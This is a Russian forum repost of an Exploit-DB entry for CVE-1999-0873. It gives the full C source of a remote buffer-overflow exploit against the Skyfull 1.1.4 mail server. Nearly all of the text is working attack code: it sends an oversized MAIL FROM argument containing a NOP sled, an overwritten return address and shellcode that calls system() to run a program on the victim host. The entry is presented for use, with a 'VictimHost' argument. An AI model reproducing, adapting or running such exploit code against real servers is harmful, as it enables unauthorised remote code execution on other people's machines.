Exploit Sky Communications Skyfull 1.1.4 Mail Server - MAIL FROM Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19584
Проверка EDB
  1. Пройдено
Автор
UNYUN
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-1999-0873
Дата публикации
1999-10-30
Sky Communications Skyfull 1.1.4 Mail Server - MAIL FROM Buffer Overflow
C:
// source: https://www.securityfocus.com/bid/759/info

The Skyfull mail server version 1.1.4 has an unchecked buffer into which the argument from the MAIL FROM command is placed. This buffer can be overwritten and arbitrary code can be executed.

/*=============================================================================
   Skyfull Mail Server Version 1.1.4 Exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN ([email protected])
  =============================================================================
*/

#include    <stdio.h>
#include    <string.h>
#include    <windows.h>
#include    <winsock.h>

#define     MAXBUF          3000
#define     RETADR          655
#define     JMPADR          651
#define     SMTP_PORT       25
#define     JMPEAX_ADR      0xbfe0a035

unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";

main(int argc,char *argv[])
{
    SOCKET               sock;
    SOCKADDR_IN          addr;
    WSADATA              wsa;
    WORD                 wVersionRequested;
    unsigned int         ip,p1,p2;
    static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
    struct hostent       *hs;

    if (argc<2){
        printf("usage: %s VictimHost\n",argv[0]); return -1;
    }
    wVersionRequested = MAKEWORD( 2, 0 );
    if (WSAStartup(wVersionRequested , &wsa)!=0){
        printf("Winsock Initialization failed.\n"); return -1;
    }
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        printf("Can not create socket.\n"); return -1;
    }
    addr.sin_family     = AF_INET;
    addr.sin_port       = htons((u_short)SMTP_PORT);
    if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if ((hs=gethostbyname(argv[1]))==NULL){
                printf("Can not resolve specified host.\n"); return -1;
            }
            addr.sin_family = hs->h_addrtype;
            memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
        printf("Can not connect to specified host.\n"); return -1;
    }
    recv(sock,packetbuf,MAXBUF,0);
    printf("BANNER FROM \"%s\" : %s\n",argv[1],packetbuf);

    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    ip=JMPEAX_ADR;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[JMPADR  ]=0xeb;
    buf[JMPADR+1]=0x80;

    strcat(exploit_code,cmdbuf);
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x0d]=p1&0xff;
    exploit_code[0x0e]=(p1>>8)&0xff;
    exploit_code[0x0f]=(p1>>16)&0xff;
    exploit_code[0x10]=(p1>>24)&0xff;
    exploit_code[0x1e]=p2&0xff;
    exploit_code[0x1f]=(p2>>8)&0xff;
    exploit_code[0x20]=(p2>>16)&0xff;
    exploit_code[0x21]=(p2>>24)&0xff;
   
memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code));

    sprintf(packetbuf,"HELO UNYUN\n");
    send(sock,packetbuf,strlen(packetbuf),0);
    recv(sock,packetbuf,MAXBUF,0);
    printf("HELO: Reply from \"%s\" : %s\n",argv[1],packetbuf);
    sprintf(packetbuf,"MAIL FROM: UNYUN <%[email protected]>\r\n",buf);
    send(sock,packetbuf,strlen(packetbuf),0);
    closesocket(sock);
    printf("Done.\n");
    return FALSE;
}
 
Источник
www.exploit-db.com

Похожие темы